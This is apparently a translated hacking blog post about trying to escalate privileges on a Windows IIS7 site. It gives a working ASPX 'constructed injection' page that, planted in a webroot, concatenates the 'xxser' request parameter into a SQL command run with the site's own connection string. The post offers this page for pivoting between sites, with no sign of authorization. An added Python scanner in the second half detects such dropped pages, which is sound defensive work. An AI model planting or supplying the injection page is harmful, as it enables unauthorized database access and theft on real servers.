Yesterday 4z1 and I were looking at a site. Privilege escalation was very hard to get; we spent a full 5 hours on it with no result. Windows 2008 + IIS7, no sa, no root, none of the usual services...
Along the way we actually used aspx constructed injection to cross over to another site. I found a pile of code online and not a single piece of it worked.
It's not much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
    // Runs on every request. The SQL text is built by concatenating the xxser
    // parameter on purpose: whatever is passed in ?xxser= is executed against the
    // database with the site's own connection string. That is the point of the page.
    void Page_Init(object sender, EventArgs e)
    {
        string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

        // "连接名" is the connectionStrings name taken from the target's web.config.
        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;

        // using closes the connection even when the statement throws; the SQL
        // error itself still propagates to the page, which is what you read.
        using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(cs))
        {
            conn.Open();
            // Replace [表] (table) and 列名 (column) with a real table and column.
            System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand(
                "select * from [表] where 列名 = " + i, conn);
            // ExecuteNonQuery returns -1 for a plain SELECT; it is used because the page
            // is fed stacked or error-based statements, not read for result rows.
            int x = command.ExecuteNonQuery();
            Response.Write(i + "\n");
            Response.Write(x);
        }
    }
</script>
</div>
</form>
</body>
</html>
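Seen from the other side, a page like the one above is a file dropped into a webroot: inline `<script runat="server">` C# that reads a request parameter and concatenates it into a `SqlCommand`. The following is an added example, not code from this post, showing one way to sweep an ASP.NET webroot for that pattern. The three sample page bodies are constructed for the example; `xxser`, the table and connection names are placeholders taken from the post, and the regexes are a heuristic, not a parser.

```python
import os
import re

# Constructed sample: the kind of dropped page the post describes
# (inline server-side C# that concatenates a request parameter into SqlCommand).
SUSPECT_ASPX = r'''<%@ Page Language="C#" %>
<script language="c#" runat="server">
void Page_Init(object sender, EventArgs e)
{
    SqlConnection conn = new SqlConnection(ConfigurationManager.ConnectionStrings["db"].ToString());
    conn.Open();
    string i = this.Page.Request.Params["xxser"];
    SqlCommand command = new SqlCommand("select * from [t] where c = " + i, conn);
    int x = command.ExecuteNonQuery();
    Response.Write(x);
}
</script>'''

# Constructed sample: an ordinary code-behind page with no inline server script.
BENIGN_ASPX = r'''<%@ Page Language="C#" CodeBehind="Default.aspx.cs" Inherits="App.Default" %>
<html><body><form runat="server"><asp:Label ID="lbl" runat="server" /></form></body></html>'''

# Constructed sample: inline server script, but the query is parameterised.
BENIGN_INLINE = r'''<script runat="server">
void Page_Load(object sender, EventArgs e)
{
    using (SqlCommand cmd = new SqlCommand("select * from t where c = @c", conn))
    {
        cmd.Parameters.AddWithValue("@c", Request["c"]);
        cmd.ExecuteReader();
    }
}
</script>'''

# Server-side script blocks; everything else in the file is markup the browser sees.
INLINE_SCRIPT = re.compile(r'<script[^>]*runat\s*=\s*"?server"?[^>]*>(.*?)</script>', re.I | re.S)
# Request["x"], Request.Params["x"], Request.QueryString["x"], ...
REQUEST_INPUT = re.compile(r'Request(?:\.(?:Params|QueryString|Form|Cookies|Headers))?\s*\[', re.I)
SQL_COMMAND = re.compile(r'new\s+(?:System\.Data\.SqlClient\.)?SqlCommand\s*\(', re.I)
# SqlCommand("literal" + ..., or SqlCommand(variable + ...: command text built by concatenation.
CONCAT_SQL = re.compile(r'SqlCommand\s*\(\s*(?:@?"[^"]*"\s*\+|[A-Za-z_]\w*\s*\+)', re.I)
PARAMETERISED = re.compile(r'\.Parameters\.Add', re.I)


def score_aspx(text):
    """Return the list of findings for one .aspx body; an empty list means nothing matched."""
    findings = []
    for m in INLINE_SCRIPT.finditer(text):
        body = m.group(1)
        if not (REQUEST_INPUT.search(body) and SQL_COMMAND.search(body)):
            continue
        if CONCAT_SQL.search(body) and not PARAMETERISED.search(body):
            findings.append("inline server script builds SqlCommand text by concatenating request input")
        if re.search(r'\bExecuteNonQuery\s*\(', body) and re.search(r'Response\.Write', body):
            findings.append("inline server script executes a statement and echoes the result to the response")
    return findings


def scan_webroot(root):
    """Walk a webroot and return {path: findings} for every .aspx/.ashx file that scored."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".aspx", ".ashx", ".asax")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                findings = score_aspx(fh.read())
            if findings:
                hits[path] = findings
    return hits


if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT_ASPX), ("benign", BENIGN_ASPX), ("benign-inline", BENIGN_INLINE)):
        print(label, score_aspx(sample))
```

The heuristic keys on the combination the post's page shows: a `runat="server"` script, request input, and a `SqlCommand` whose text is assembled with `+`. A page that concatenates two string literals will also trip `CONCAT_SQL`, so treat a hit as something to read, not as a verdict; `scan_webroot` is there to run it over a real `wwwroot` rather than the embedded samples.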